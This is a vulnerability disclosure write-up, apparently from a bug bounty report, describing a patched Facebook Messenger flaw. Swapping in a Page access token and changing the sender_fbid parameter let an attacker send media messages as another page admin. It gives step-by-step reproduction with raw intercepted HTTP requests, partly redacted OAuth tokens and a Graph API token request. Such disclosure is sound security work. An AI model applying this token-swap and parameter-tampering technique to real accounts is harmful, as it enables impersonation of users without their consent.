Published On: 19 May 2019
Sending message on behalf of other users
Privacy/Authentication
Messenger | Android
---
HIGH VALIDDescription
An attacker is able to send media messages on behalf of other users on Facebook Messenger ,by making the victim admin/editor/moderator on his Facebook Page , then attacker will intercept the request on messenger while he upload photo/video/audio to someone , then changing the authorization header token to a "Page Token" and the sender_fbid to the victim(admin id ) .
Impact
This could have allowed a malicious user to send media messaged on behalf of other users by making them(victims) admins on his page .
Reproduction Steps
Step
1
Setup
- "Kassem Bazzoun" is the attacker
- "Semi Colon” is the Victim
- "Kassem Bazzoun" made the Victim “Semi Colon“ as an editor on his page
Step
2
Intercept Requests
Attacker can get these requests while sending image/ voice/video in Facebook Messenger (Android/IOS)
Just focus on the Authorization Header and the parameters sender_fbid / to
- Photos
POST /messenger_image/3e8cde28c9b2d9112e9c87af9b71fbc56528664348207412316 HTTP/1.1
Authorization: OAuth EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphk.........DgWUkgTUyMBUvs
original_timestamp: 1556554877552
sender_fbid: victim_id
to: receiver_id
Accept-Encoding: gzip, deflate
or
- Video Request
POST /messenger_video/83e5ecba32f23sfd09a99f33b96529102120235284153 HTTP/1.1
X-Entity-Name: VID-20190430-WA0150.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/212.1.0.13.109;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
Authorization: OAuth EAAGNO4a7r2wBAJJXT1VkfYFfwdf9ZCpSxfcGpfi3azopoTlEvYEZC3639cIVmKefBhvKXadoD17GMt7t3Xx.........eTfcjUHvQZDZD
media_hash: 4dc51a78fd7e39ab3369ddd3873d4d1794b499621a1bd48d867c05c1a6ce65a5
X-FB-Net-HNI: 41503
attempt_id: 6529102120248812254
send_message_by_server: 4
app_id: 256002347743983
Content-Type: application/octet-stream
offline_threading_id: 65291021202332323
X-FB-Connection-Quality: GOOD
sender_fbid : victim_id
to: receiver_id
X-FB-SIM-HNI: 41503
or
- Voice Message Request
/messenger_audio/a174a21348fb713ab40a796e63232fs0986529693648684848294 HTTP/1.1
X-Entity-Name: USER_SCOPED_TEMP_DATA_orca-audio-1556800271887.mp4
X-FB-Connection-Type: unknown
User-Agent: Dalvik/2.1.0 (Linux; U; Android 9; INE-LX1r Build/HUAWEIINE-LX1r) [FBAN/Orca-Android;FBAV/212.1.0.13.109;FBPN/com.facebook.orca;FBLC/en_US;FBBV/151534286;FBCR/touch;FBMF/HUAWEI;FBBD/HUAWEI;FBDV/INE-LX1r;FBSV/9;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=2128};FB_FW/1;]
duration: 9811
Authorization: OAuth EAADo1TDZCuu8BANUYHkTMK4SxtTRPbqtIgIuUShTWmsHujjEVIRELxlk5eiZCnA36hSgKl9gjjFJlmuMH3KYy6DlGOhojRZCDHjBZAyMEw0gLut6V4dEFaViofLKELJENiBBjW8SmMZCRho0A6Fq9ZBKXVIuf8nGPZAywnaqjunqwZDZD
X-FB-Net-HNI: 41503
attempt_id: 6529693648683742874
-
sender_fbid : victim_id
-
to: receiver_id
Step
3
Kassem (attacker) changed the token in the Authorization Header of the request to his “Page Token” by taking the token from the previous Authorization Header and generating the page token via GRAPH API EXPLORER
To get the page access token send the following request
-
ACCESS_TOKEN = Token for Facebook Messenger
-
GET/V3.2/page_id?fields=access_token
This request should return
{
"access_token": "EAADo1TDZCuu8BAGLOOBcqIqRnGbSHm48FCJdMC4aWuZCrGJJLdwwKrJJt5awRGPiUXGswiwUUTAphkkZBv15yb7FNy357AcxAtjZCSrjFkL35muO3h3dZB2zlSZBOiS....."
"id": "page_id"
}
So replace the Authorization Token by the new one.
Note: You should generate a “Page Token” for the page where you and the victim are admin on it .
Step
4
After chaning the Authorization Header to the page token, I was able to send media messages on behalf of any admin in the page where the server didn't check if this token belong to the admin or not :) just a validation if the user has a role in this page (where token is belong to this page ) , and didn't check who generate this token !
so let's change the parameters now :)
sender_fbid :
parameter that indicate who is the user sent this message (SENDER ID)
change it to the victim id ( admin id)
to
parameter that indicate who received this message (receiver ID)
Step
5
Finally send the request!
boom!
I sent the message from the victim account (Semi colon) to myself !
Also I can send the message to any other user not only to myself !
Imagine someone send a message from your account to another user !
Step
6
(click on show image)
This is an example how I sent a message on behalf of my friend ( of course I got the permission before testing on his account )
Patching
Facebook fixed the vulnerability by preventing any user from using the "Page Access Token" to send message on behalf of any admin , including your account , so page access token is only used to send message on behalf of the page itselft . New server reply : err_code":"1545003","err_str":"You cannot perform that action."
Videos
